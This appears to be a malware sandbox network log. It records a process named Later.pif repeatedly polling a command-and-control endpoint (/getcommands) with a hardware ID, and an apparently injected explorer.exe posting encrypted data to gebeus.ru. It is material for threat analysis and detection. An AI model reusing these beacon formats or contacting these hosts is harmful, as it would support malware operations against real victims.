Jul 15, 2024 06:13:42.212558985 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:42 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=okv13m71ekjc413qdnt9hvda5u; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	49769	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:42.340989113 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 33 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=13
Jul 15, 2024 06:13:43.048222065 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:42 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=58bog49l3t51ckfp2ncg00gvcd; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	49770	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:43.164518118 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 34 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=14
Jul 15, 2024 06:13:43.852001905 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:43 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=0b4r0idgjh4qnj3935fq63tkv9; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	49771	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:43.975990057 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 35 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=15
Jul 15, 2024 06:13:44.678807974 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:44 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=hs9ebbvb76so1vpvfbcilof7gm; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	49772	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:44.810122967 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 36 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=16
Jul 15, 2024 06:13:45.519481897 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:45 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=ijsen0ag2mf1b2hvk80ikt028l; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	49773	186.101.193.110	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:45.057849884 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ifgnsbejriuwteg.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 190 Host: gebeus.ru
Jul 15, 2024 06:13:45.057887077 CEST	190	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 39 30 af fe Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA .[k,vu90QEPO`>8Z.\|j>js\(C%Z>N;U^9O7v\|V-'\Fp<u
Jul 15, 2024 06:13:46.125993013 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:13:45 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	49774	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:45.638272047 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 37 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=17
Jul 15, 2024 06:13:46.338176012 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:46 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=0p7kalhv5b6qt3b9u0vrvtm8os; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	49775	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:46.460412979 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 38 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=18
Jul 15, 2024 06:13:47.157293081 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:47 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=ta16q6l8mgfuggn73dpo8dmir7; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	49776	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:47.300512075 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 39 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=19
Jul 15, 2024 06:13:48.021713018 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:47 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=61g6jfee9704o69ovkrtk14p68; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	49777	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:48.134089947 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 30 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=20
Jul 15, 2024 06:13:48.822381973 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:48 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=deoqqolamvv2taki0nf3aflq0h; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	49778	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:48.950762033 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 31 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=21
Jul 15, 2024 06:13:49.629947901 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:49 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=tikquem0h8gi3qsnf908nsf3mu; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	49779	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:49.748111963 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 32 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=22
Jul 15, 2024 06:13:50.453068972 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:50 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=bk449epbvhbse16qsnen6vdnlq; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	49780	186.101.193.110	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:50.484285116 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dxpeojjvxfrbjrw.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 251 Host: gebeus.ru
Jul 15, 2024 06:13:50.484298944 CEST	251	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 29 38 c4 b7 Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA .[k,vu)8M%Yp`3Cr2P5bqdKg<Bo+?}r57YnCh5W-{-'Lj5Lk!$6^
Jul 15, 2024 06:13:51.529536009 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:13:51 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	49781	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:50.569794893 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 33 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=23
Jul 15, 2024 06:13:51.288285017 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:51 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=q406bdnfumo6d0p28dtgb9rtjl; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	49782	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:51.414341927 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 34 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=24
Jul 15, 2024 06:13:52.118026018 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:52 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=04a3rgn0gh7rifmm8bsnau83q9; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	49783	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:52.242655039 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 35 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=25
Jul 15, 2024 06:13:52.949642897 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:52 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=q0gndi7cnvn0boe12b78an6r6b; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	49784	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:53.070255041 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 36 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=26
Jul 15, 2024 06:13:53.762818098 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:53 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=mbctpm5gjlvd2bv8i9g8qosneg; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	49785	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:53.884634972 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 37 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=27
Jul 15, 2024 06:13:54.628289938 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:54 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=sdv0d7mvilccga7qmkki9e478r; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.5	49786	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:54.743530035 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 38 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=28
Jul 15, 2024 06:13:55.453135967 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:55 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=e0n7l2r6tc8jmd0pb49geh5kd8; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.5	49787	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:55.575823069 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 32 39 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=29
Jul 15, 2024 06:13:56.286751986 CEST	421	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 15 Jul 2024 04:13:56 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=h8j7atfd9q9op56rmfsbbd5psi; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 64 0d 0a 7b 22 6d 73 67 22 3a 66 61 6c 73 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: d{"msg":false}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.5	49788	186.101.193.110	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:55.985775948 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rklgpmbjqrvbpp.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 316 Host: gebeus.ru
Jul 15, 2024 06:13:55.985775948 CEST	316	OUT	Data Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 34 4c fb 93 Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1\|J7 M@NA .[k,vu4L_vFB~5$xPdUB$<I1.<}).1g&%28 u`CJ)@4kAOq2B:YF%a[H
Jul 15, 2024 06:13:57.048315048 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 15 Jul 2024 04:13:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.5	49789	46.246.96.149	80	6584	C:\Users\user\AppData\Local\Temp\78801\Later.pif

Timestamp	Bytes transferred	Direction	Data
Jul 15, 2024 06:13:56.399029016 CEST	179	OUT	POST /getcommands HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 46.246.96.149 Content-Length: 59 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 33 30 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=30
